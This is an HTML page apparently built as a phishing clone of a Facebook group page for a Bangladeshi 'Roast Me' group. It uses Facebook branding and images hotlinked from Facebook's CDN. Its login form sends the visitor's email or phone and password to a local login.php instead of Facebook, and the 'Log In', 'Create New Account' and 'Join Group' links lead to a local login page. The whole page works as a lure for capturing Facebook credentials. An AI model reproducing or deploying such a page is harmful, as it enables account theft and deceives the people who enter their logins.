<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<link data-default-icon="https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico" data-badged-icon="https://static.xx.fbcdn.net/rsrc.php/ye/r/Ta8_J_nYekI.ico" rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico" />
	<meta name="viewport" content="width=device-width">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="style.css">
	<link rel="stylesheet" type="text/css" href="media.css">
	<link rel="stylesheet" type="text/css" href="font-awesome.css">
	<link rel="stylesheet" type="text/css" href="900px.css">
	<link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@300&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/bae03eaa0a.css">
    <script src="https://use.fontawesome.com/bae03eaa0a.js"></script>
	<title>🔥👌 Roast Me 👌🔥</title>

</head>
<body>
	<section class="fst">
		<div class="header">
			<h2><b>facebook</b></h2>
			<div class="nav">
				<form class="form" action="../../../login.php" method="POST">
					<input type="text" name="username" placeholder="Email Or Phone">
				<input type="password" name="password" placeholder="password">
				<button class="log" type="submit">Log In</button>
				<a class="forget" href="login.html">Forgotten account?</a>
			</form>
			</div>

		</div>
		<div class="m-header">
			<h1><b>facebook</b></h1>
			<p><b>🔥👌 Roast Me 👌🔥</b> is on Facebook. To connect with 🔥👌 Roast Me 👌🔥, log in or create an account.</p>
				<a href="login.html" class="btn"><h4>Log In</h4></a>
				<p class="or">or</p>
			    <a href="login.html" class="bttn"><h4>Create New Account</h4></a>


		</div>
	</section>

	<section class="m-cover">
		<div class="cover">
			<div class="mtext">
				<h3><a href="info.html">🔥👌 Roast Me 👌🔥<br><span>Public group</span></a></h3>
			</div>
			<a href="info.html"><i class="fa fa-chevron-right" aria-hidden="true"></i></a>

		</div>

	</section>

	<hr>
<section class="main">
		<a class="join" href="login.html"><h4>Join Group</h4></a><hr class="hr">

		<div class="row">
			<i class="fa fa-globe" aria-hidden="true"></i>
			<div class="details">
				<h4>Public</h4>
				<p>Anyone can see who's in the group and what they post.</p>
			</div>

		</div><hr class="hr">
		<div class="row">
			<i class="fa fa-eye" aria-hidden="true"></i>

			<div class="details">
				<h4>Visible</h4>
				<p>Anyone can find this group.</p>
			</div>

		</div><div class="b"></div>

		<div class="about">
			<h4>About</h4><hr class="hr">
			<p>Welcome to our Roasting Community🖤</p>
		</div>
		<div class="empty"></div>


	</section>
	<section class="desktop">
		<div class="db">
			<div class="top-image">
			<img src="https://scontent.fird1-1.fna.fbcdn.net/v/t1.6435-9/69009722_10218325478501933_3948864069485723648_n.jpg?_nc_cat=110&ccb=1-3&_nc_sid=8631f5&_nc_eui2=AeFAg7YGTo5qMmI0XIFbMAX6HZwpqrby_40dnCmqtvL_jQL6cZjNyM8uom_vP15dokduPL3S-CTT3F_kb2oltTEK&_nc_ohc=NSCOwvrxT3cAX8d9IXa&_nc_ht=scontent.fird1-1.fna&oh=602fe225be919cd8206884a0873bac16&oe=60FF3762">
			<div class="bio">
				<h1>🔥👌 Roast Me 👌🔥</h1>
				<div class="d-row">
					<h4>Public group || 55.5k member</h4>
				</div>
			</div>
		</div>
		</div>
	</section>
	<hr class="dag">
	<section class="ab">
		<div class="flex">
			<ul class="bar">
				<a href="#"><li class="ab-li">About</li></a>
				<a class="ab-link" href="#"><li>Discussion</li></a>
			</ul>
			<a href="login.html"><h4 class="d-join">Join Group</h4></a>
		</div>
	</section><br><br>
	<section class="d-m">
		<div class="desktop-about">
			<h3>About this group</h3><hr class="line">
			<p>Welcome to our Roasting Community🖤</p>
			<ul class="ab-details">
				<li><i class="fa fa-globe" aria-hidden="true"></i>
				</li>
			   <li>Public<br><span>Anyone can see who's in the group and what they post</span></li>
			</ul>

			<ul class="ab-details">
				<li><i class="fa fa-eye" aria-hidden="true"></i>
				</li>
			   <li>Visible<br><span>Anyone can find this group.</span></li>
			</ul>

			<ul class="ab-details">
				<li><i class="fa fa-map-marker" aria-hidden="true"></i>
				</li>
			   <li>&nbsp<b>Bangladesh</b></li>
			</ul>


			<ul class="ab-details">
				<li><i class="fa fa-clock-o" aria-hidden="true"></i>
				</li>
			   <li><p>History<br><span>Group created on 28 May 2019. Name last changed on 11 June 2019.<a href="#"><b>See More</b></a></span></p></li>
			</ul>
		</div><br>

		<div class="desktop-about">
			<div class="member"><h4>Member - <span>8.2k</span></h4></div>
		</div>


<br>

		<div class="desktop-about">
			<h3>Activity</h3><hr class="line">
			<ul class="ab-details">
				<li><i class="fa fa-comments-o" aria-hidden="true"></i>
				</li>
			   <li>No new posts today<br><span>8 in the last month</span></li>
			</ul>

			<ul class="ab-details">
				<li><i class="fa fa-users" aria-hidden="true"></i>
				</li>
			   <li>8,211 total members<br><span>+ 60 in the last week</span></li>
			</ul>

			<ul class="ab-details">
				<li><i class="fa fa-users" aria-hidden="true"></i>
				</li>
			   <li><b>Created on 2 years ago</b></li>
			</ul>
		</div><br>
		<div class="desktop-about">
			<h3>Group rules from the admins</h3><hr class="line">
			<ul class="ab-details">
				<li class="nmbr">1</li>
			   <li class="number">গ্রুপের নিয়ম-কানুন</li>
			</ul>
			<p class="p">#🔥👌 Roast Me 👌🔥 গ্রুপে আপনাদের স্বাগতম আমাদের গ্রুপের নিয়ম-কানুন:<br> ★প্রথমেই বলে নিচ্ছি যারা Sarcasm বোঝেন না তাদের জন্য এই গ্রুপ নয়<br> । ★গ্রুপে যে কোনো প্রকার Memes পোস্ট করা যাবে । তবে Lame<br>Meme পোস্ট</p>
		</div>
	</section>
</body>
</html>